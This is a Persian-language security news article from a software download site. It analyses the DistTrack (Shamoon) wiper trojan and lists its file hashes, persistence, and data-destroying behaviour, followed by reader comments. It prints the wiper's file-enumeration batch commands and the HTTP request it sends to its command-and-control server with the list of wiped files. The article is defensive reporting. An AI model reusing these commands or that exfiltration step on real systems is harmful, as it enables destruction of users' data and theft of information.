سافت گذر دانشنامه نرم افزار - دانلود رایگان نرم افزار

همه دسته بندی ها

منو
جستجو
اطلاعیه های مهم سایت اطلاعیه های مهم سایت
💐 میلاد زینت پدر حضرت زینب سلام الله علیها مبارک باد 💐
 
 
  1. جهت رفع مشکل باز شدن سایت به دلیل بلاک توسط  نود 32 این ویدیو یا این ویدیو(ورژن 9 به بالا) یا راهنمای تصویری را مشاهده کنید
  2. اکانت های بروزرسانی نود32 با قیمت های مناسب به صورت یک ، سه ، شش و دوازده ماهه از اینجا قابل خرید می باشد.

نرم افزار های پرکاربرد

ثبت نام | ورود

امنیت سایبری

ویروس DistTrack در کمین است!

به گزارش سافت گذر به نقل از ظهور، بدافزار “DistTrack” از نوع بدافزارهای Trojan بوده و رفتار بسیار مخربی دارد. این بدافزار با رونویسی فایلها و بخش MBR و جایگزین کردن داده های آنها با داده های خراب، سبب از بین رفتن دائمی اطلاعات ذخیره شده بر روی دیسک می شود. W۳۲/DistTrack برای اولین بار در مرداد ماه سال جاری (۱۳۹۱) مشاهده شد.

نحوه انتشار اولیه این بدافزار هنوز مشخص نیست اما قابلیت انتشار از طریق Admin$ را دارد.

فایلهای اصلی مورد استفاده بدافزار DistTrack عبارتند از:

Filename : str.exeLength : ۹۸۹۱۸۴ bytesMD۵ : B۱۴۲۹۹FD۴D۱CBFB۴CC۷۴۸۶D۹۷۸۳۹۸۲۱۴

SHA۱ : ۷C۰DC۶A۸F۴D۲D۷۶۲A۰۷A۵۲۳F۱۹B۷ACD۲۲۵۸F۷ECC

Filename : str.exe

Length : ۹۸۹,۱۸۴ bytes

MD۵ : D۲۱۴C۷۱۷A۳۵۷FE۳A۴۵۵۶۱۰B۱۹۷C۳۹۰AA

SHA۱: ۵۰۲۹۲۰A۹۷E۰۱C۲D۰۲۲AC۴۰۱۶۰۱A۳۱۱۸۱۸F۳۳۶۵۴۲

This version does run however and results in the following files being dropped on the system.

Filename : netinit.exe

Length : ۱۳۳۱۲۰ bytes

MD۵ : ۴۱F۱۳۸۱۱FA۲D۴C۴۱B۸۰۰۲BFB۲۵۵۴A۲۸۶

SHA۱ : C۴۰۴CDC۹F۸۰۴B۵۶۵D۶۰B۲ADB۸۷C۹A۶B۷AFB۴۲B۹۰

Filename : dfrag.exe

Length : ۱۹۴۰۴۸ bytes

MD۵ : ۳B۷۴۰CCA۴۰۱۷۱۵۹۸۵F۳A۰C۲۸F۸۵۱B۶۰E

SHA۱ : ۵۷۵۲۸۹۸ABC۸۵۵۲۸D۵۰۷۳۹A۱EDC۸E۶FEED۰A۳E۱AD

Filename : drdisk.sys

Length : ۲۷۲۸۰ bytes

MD۵ : ۱۴۹۳D۳۴۲E۷A۳۶۵۵۳C۵۶B۲ADEA۱۵۰۹۴۹E

SHA۱ : CE۵۴۹۷۱۴A۱۱BD۴۳B۵۲BE۷۰۹۵۸۱C۶E۱۴۴۹۵۷۱۳۶EC

ظاهراً فایلهای اجرایی این بدافزار در ۱۹ مرداد ایجاد شده اند.

با اجرا شدن فایل اجرایی اولیه، بدافزار یک کپی از خود را با نام tsksvr.exe در مسیر SystemRoot\System۳۲ قرار می دهد. در ادامه، این فایل تحت یک سرویس با مشخصاتی که در شکل زیر نمایش داده شده است اجرا و فایل اولیه حذف می شود.

بدافزار DistTrack
با شروع به کار سرویس ایجاد شده، هر دو دقیقه یکبار یک فایل اجرایی با یکی از نامهای زیر بر روی سیستم قربانی کپی می شود:

caclsrv.exe, certutl.exe, clean.exe, ctrl.exe, dfrag.exe, dnslookup.exe, dvdquery.exe, event.exe, findfile.exe, gpget.exe, ipsecure.exe, iissrv.exe, msinit.exe, ntfrsutil.exe, ntdsutl.exe, power.exe, rdsadmin.exe, regsys.exe, sigver.exe, routeman.exe, rrasrv.exe, sacses.exe, sfmsc.exe, smbinit.exe, wcscript.exe, ntnw.exe, netx.exe, fsutl.exe, extract.exe,

همچنین این ویروس دارای یک بخش Wiper است که وظیفه رونویسی فایلهای دیسک سخت، MBR و Boot Sector را عهده دار است. این بخش فرامین زیر را اجرا می کند:

dir “C:\Documents and Settings\” /s /b /a:-D >nul | findstr -i download >nul >f۱.infdir “C:\Documents and Settings\” /s /b /a:-D >nul | findstr -i document >nul >>f۱.infdir C:\Users\ /s /b /a:-D >nul | findstr -i download >nul >>f۱.inf

dir C:\Users\ /s /b /a:-D >nul | findstr -i document >nul >>f۱.inf

dir C:\Users\ /s /b /a:-D >nul | findstr -i picture >nul >>f۱.inf

dir C:\Users\ /s /b /a:-D >nul | findstr -i video >nul >>f۱.inf

dir C:\Users\ /s /b /a:-D >nul | findstr -i music >nul >>f۱.inf

dir “C:\Documents and Settings\” /s /b /a:-D >nul | findstr -i desktop >nul >f۲.inf

dir C:\Users\ /s /b /a:-D >nul | findstr -i desktop >nul >>f۲.inf

dir C:\Windows\System۳۲\Drivers /s /b /a:-D >nul >>f۲.inf

dir C:\Windows\System۳۲\Config /s /b /a:-D >nul | findstr -v -i systemprofile >nul >>f۲.inf

dir f۱.inf /s /b >nul >>f۱.inf

dir f۲.inf /s /b >nul >>f۱.inf

نتیجه اجرای این فرامین، تهیه فهرستی از نام و مسیر فایلهایی است که در شاخه های Desktop، Documents، Download، Video، Music، Pictures قرار دارند. این فهرست در دو فایل به نامهای f۱.inf و f۲.inf ذخیره می شوند. در ادامه، یک کپی از فهرست فایلها در فایل زیر ذخیره می شود:

C:\WINDOWS\inf\netfb۳۱۸.pnf

سپس داده های این فایلها، با ۱۰۲۴ بایت اول یک فایل JPEG به طور مکرر جایگزین می شود. در این حالت، محتوای اصلی فایلها از بین رفته و غیرقابل برگشت می شوند.

همچنین بخش Wiper فایلی با نام drdisk.sys را بر روی سیستم آلوده کپی می کند که از آن برای رونویسی MBR و جداول پارتیشن دیسک استفاده می کند. داده هایی که برای رونویسی استفاده می شوند همانهایی هستند که در تصویر بالا نمایش داده شده است. این رونویسی سبب می شود که دیسک بعد از راه اندازی مجدد دستگاه به وسیله سیستم غیرقابل شناسایی شود.

در نهایت این بدافزار فهرستی از فایلهای رونویسی شده را از C:\WINDOWS\inf\netfb۳۱۸.pnf خوانده و اطلاعات را به مرکز فرماندهی (Command and Control) خود با مشخصات زیر ارسال می کند:

GET /ajax_modal/modal/data.asp?mydata=_۱CD&uid=۱۷۲.xxx.xxx.xxx&state=۹۳۲۳۸۵۹HTTP/۱.۱Connection: keep-alive

User-Agent: you

Host: ۱۰.۱.۲۵۲.۱۹

Pragma: no-cache

به روز نگه داشتن ضدویروس و همچنین استفاده از تنظیمات توصیه شده به وسیله کارشناسان (مانند فعال سازی قاعده Prevent remote creation/modification of executable and configuration files) در نرم افزار ضدویروس می تواند کامپیوتر را در مقابل این ویروس محافظت کند.

بدافزار DistTrack که اکنون به وسیله برخی شرکتهای ضدویروس “Shamoon” هم نامیده می شود، به احتمال قوی از طریق ایمیل و به صورت یک برنامه اجرایی مخفی شده در درون فایل پیوست (attachemnt) ایمیل، منتشر می شود. به نظر می رسد که این برنامه اجرایی از یک نقطه ضعف ناشناخته برای نفوذ به سیستم قربانی سوءاستفاده می کند.

با توجه به آمار آلودگی های گزارش شده، برخی شرکتهای ضدویروس اعتقاد دارند که هدف اصلی بدافزار DistTrack حوزه انرژی (نفت و گاز) است. از جمله، شرکت نفت عریستان سعودی (Aramco) مورد حمله این بدافزار قرار گرفته و طبق برخی اخبار غیرموثق، بخش های بزرگی از این شرکت نفتی دچار اختلال شده است و علاوه بر کامپیوتر پرسنل، سرورهای ایمیل و وب و همچنین Domain Controller مورد حمله و آسیب قرار گرفته اند.

برخی کارشناسان امنیتی این بدافزار را نسخه جدیدی از بدافزاری می دانند که در ایران به Wiper مشهور شد و در نهایت منجر به کشف بدافزار Flame شد. از طرف دیگر، برخی اعتقاد دارند که بدافزار DistTrack یک بدافزار جدید و مستقل است که در ساخت آن فقط از Wiper الهام گرفته شده است.

نظرتان را ثبت کنید کد خبر: 10715 گروه خبری: امنیت سایبری منبع خبر: zohur.net تاریخ خبر: 1391/06/02 تعداد مشاهده: 2918
اخبار مرتبط با این خبر
نظر های کاربران

سلام
با تشکر از هشدارهای بموقعتان
آیا این ویروس توسط ویروس یاب های فعلی شناخته میشه؟
اگه نه چکار باید بکنیم؟

من دیروز وقتی داشتم ایمیلمو چک میکردم، یه ایمیل ناشناس رو که باز کردم یه هو یه عکس وسط دسکتاپ ظاهر شد که عکس یه سر(انسان) خون آلود بود و یه چاقو توی سرش بود و بعد از چند ثانیه محو شد!!
بعد از اون My Music و My Pictures و My Videosم تغییرنام پیدا کرد به %s''s Music و %s's Pictures و %s's Videos !!! و نود32ی آپدیت شده کاملا در آرامش به سر میبرد!!
البته فکر نکنم ربطی به این ویروس داشته باشه ولی نمیدونم چیکار کنم؟؟!!lay:none">fexofenadin kinder forskningogkaffe.site fexofenadin nebenwirkung

سلام و وقت بخیر
با تشکر از دست اندرکاران سایت .
ضمنا در این دنیای مجازی که همانند دنیای خیالی افراد است هم می توان تابع اخلاقیات بود و هم می توان تابع غیر اخلاقیات بود بنابراین بستگی به نظر و عقیده هرکس دارد ولی باید مدنظر داشت که داشتن قانون برای هر فضا، محیط و دنیایی، باعث استحکام آن فضا، محیط و دنیا خواهد شد. ولی همیشه هم نمی توان پشت چراغ قرمز ایستاد و حرکت دیگران را دید.

سلام دوستان اگه نظرات قبلی منو خونده باشید حتما یادتونه که گفتم قراره این حملات فشرده تر و سریع تر بشه و تا قبل از راه اندازی اینترانت ملی به حداکثر خود میرسد

سلام این قابلیت دقیقا چی کار میکنه هر کی میدونه بگه ممنون :Prevent remote creation/modification of executable and configuration files)

سرور آپدیت نود 32
پیشنهاد سافت گذر
Lynda - Google AdWords Essential Training

Lynda - Google AdWords Essential Training

فیلم آموزش مفاهیم اساسی گوگل اَدوُردز

ترس از قضاوت مردم

ترس از قضاوت مردم

چگونه ناخواسته تحت تاثیر قضاوت دیگران قرار نگیریم؟

MyRoll Gallery 3.4.3.6 for Android +4.0

MyRoll Gallery 3.4.3.6 for Android +4.0

گالری هوشمند اندروید

World of Goo 1.2 for Android

World of Goo 1.2 for Android

بازی ورد آف گو

Valhalla Hills + Update v1.02

Valhalla Hills + Update v1.02

تپه‌های والهالا

علم نجوم و فضا

علم نجوم و فضا

آشنایی با آسمان

ابرقدرت شرق

ابرقدرت شرق

رقابت های ژئوپلیتیک در قرن 21

F1 Race Stars + Update 1.1 + DLC Pack

F1 Race Stars + Update 1.1 + DLC Pack

ستارگان مسابقات فرمول یک

Real World Racing - Miami

Real World Racing - Miami

مسابقات اتومبیل‌رانی رئال ورلد رِیسینگ - میامی

مهم ترین محورهای خبری - تحلیلی روز

مهم ترین محورهای خبری - تحلیلی روز

پایش نامه مپتا

قرآن به روایت تصویر

قرآن به روایت تصویر

آشنایی تصویری با قرآن

MyRadar Weather Radar Pro 8.58.1 For Android +8.0

MyRadar Weather Radar Pro 8.58.1 For Android +8.0

برنامه هواشناسی رادار

SeoTools for Excel 10.0.2

SeoTools for Excel 10.0.2

بهینه‌سازی موتور جستجو

HD Camera Pro 3.0.3 for Android 3.2

HD Camera Pro 3.0.3 for Android 3.2

دوربین اچ دی

سخنرانی علیرضا پناهیان با موضوع نماز خوب - 4 جلسه

سخنرانی علیرضا پناهیان با موضوع نماز خوب - 4 جلسه

سخنرانی نماز خوب با علیرضا پناهیان

Pro Basketball Manager 2017

Pro Basketball Manager 2017

شبیه ساز

VMware InstallBuilder Enterprise 25.3 / macOS

VMware InstallBuilder Enterprise 25.3 / macOS

ساخت فایل های نصبی قابل اجرا در پلتفرم های مختلف

MegaCast – Chromecast player 1.3.17 For Android +4.1

MegaCast – Chromecast player 1.3.17 For Android +4.1

پلیر کروم کست

Udemy - The HTML & CSS Bootcamp 2023 Edition

Udemy - The HTML & CSS Bootcamp 2023 Edition

آموزش جامع HTML و CSS

Mini Motor Racing 2.0.2 for Android 2.3

Mini Motor Racing 2.0.2 for Android 2.3

ماشین سواری در Race

Office 2013 Bible

Office 2013 Bible

آموزش Office 2013

سخنرانی حجت‌الاسلام نظری منفرد با موضوع توصیه حضرت زهرا (س) به مراقبت از نفس در خطبه ی فدکیه

سخنرانی حجت‌الاسلام نظری منفرد با موضوع توصیه حضرت زهرا (س) به مراقبت از نفس در خطبه ی فدکیه

سخنرانی توصیه حضرت زهرا (س) به مراقبت از نفس با نظری منفرد

Microsoft Arrow Launcher 6.2.200602.89140 for Android +4.0

Microsoft Arrow Launcher 6.2.200602.89140 for Android +4.0

لانچر مایکروسافت

Moonfall

Moonfall

اکشن جنگی

Schlumberger Petrel 2015.5.0.1908 x64 + Plugins + New License

Schlumberger Petrel 2015.5.0.1908 x64 + Plugins + New License

نرم افزار پترل بررسی و تحلیل چالش های زیر زمینی و شبیه سازی مخازن

دورهٔ آموزش ویدئویی مهارت‌ها و تعمیرات مربوط به «برق خودرو» - به زبان فارسی

دورهٔ آموزش ویدئویی مهارت‌ها و تعمیرات مربوط به «برق خودرو» - به زبان فارسی

فیلم آموزش تعمیرات خودرو

ترفندهایی کاربردی در دنیای فناوری اطلاعات

ترفندهایی کاربردی در دنیای فناوری اطلاعات

آشنایی با ترفندهایی مهم و پرکاربرد برای کامپیوتر و اینترنت

GNS3 3.0.4 Final / Wireshark 4.4.6 / macOS

GNS3 3.0.4 Final / Wireshark 4.4.6 / macOS

شبیه سازی شبکه های کامپیوتری جی ان اس3

Sniper Elite V2

Sniper Elite V2

تک تبرانداز حرفه ای 2

ارتباط قرآن و ولایت از حجت الاسلام والمسلمین سیدمحمدمهدی میرباقری - 2 جلسه

ارتباط قرآن و ولایت از حجت الاسلام والمسلمین سیدمحمدمهدی میرباقری - 2 جلسه

حاج آقا سیدمحمدمهدی میرباقری با موضوع ارتباط قرآن و ولایت

Autodesk AutoCAD Plant 3D 2025 / 2024 / 2022.1.1 / 2021.1.1 / 2020.1 / 2019.2

Autodesk AutoCAD Plant 3D 2025 / 2024 / 2022.1.1 / 2021.1.1 / 2020.1 / 2019.2

اتوکد پلنت تری دی

Crash Bandicoot 4: It's About Time

Crash Bandicoot 4: It's About Time

کراش باندیکوت 4

آموزش میکروکنترلر AVR

آموزش میکروکنترلر AVR

آموزش میکروکنترلر ای وی آر

Vivaldi 7.3.3635.11 Win/Mac/Linux + Portable

Vivaldi 7.3.3635.11 Win/Mac/Linux + Portable

مرورگر اینترنت ویوالدی

War Chess

War Chess

شطرنج جنگی

Conan Unconquered

Conan Unconquered

بهترین بازی های استراتژیک برای کامپیوتر

آموزش کامل تعمیرات سیستم تعلیق اتومبیل پراید از سایپا یدک

آموزش کامل تعمیرات سیستم تعلیق اتومبیل پراید از سایپا یدک

فیلم آموزش تعمیرات پراید

سخنرانی حجت الاسلام مرتضی آقاتهرانی با موضوع بیداری و غفلت - 2 جلسه

سخنرانی حجت الاسلام مرتضی آقاتهرانی با موضوع بیداری و غفلت - 2 جلسه

سخنرانی بیداری و غفلت با مرتضی آقاتهرانی

Bomb The Monsters HD v1.2 - Multilingual

Bomb The Monsters HD v1.2 - Multilingual

بمباران هیولاها نسخه‌ی چند زبانه 1.2 با کیفیت اچ‌دی

DX Toolbox 3.5.0 / DX Battery Saver 3.4.0 for Android +2.2

DX Toolbox 3.5.0 / DX Battery Saver 3.4.0 for Android +2.2

مدیریت کامل سیستم عامل اندروید

www.esetupdate.ir www.esetupdate.ir
دسته بندی مشاغل
مشاهده بقیه

برنامه نویسی و شبکه

طراحـــــی و گرافیک

مهندســــی و تخصصی

تدوین و ویدیوگرافی

سه بعــــدی و CGI

خبرنامه

با عضویت در خبرنامه، زودتر از همه باخبر باش!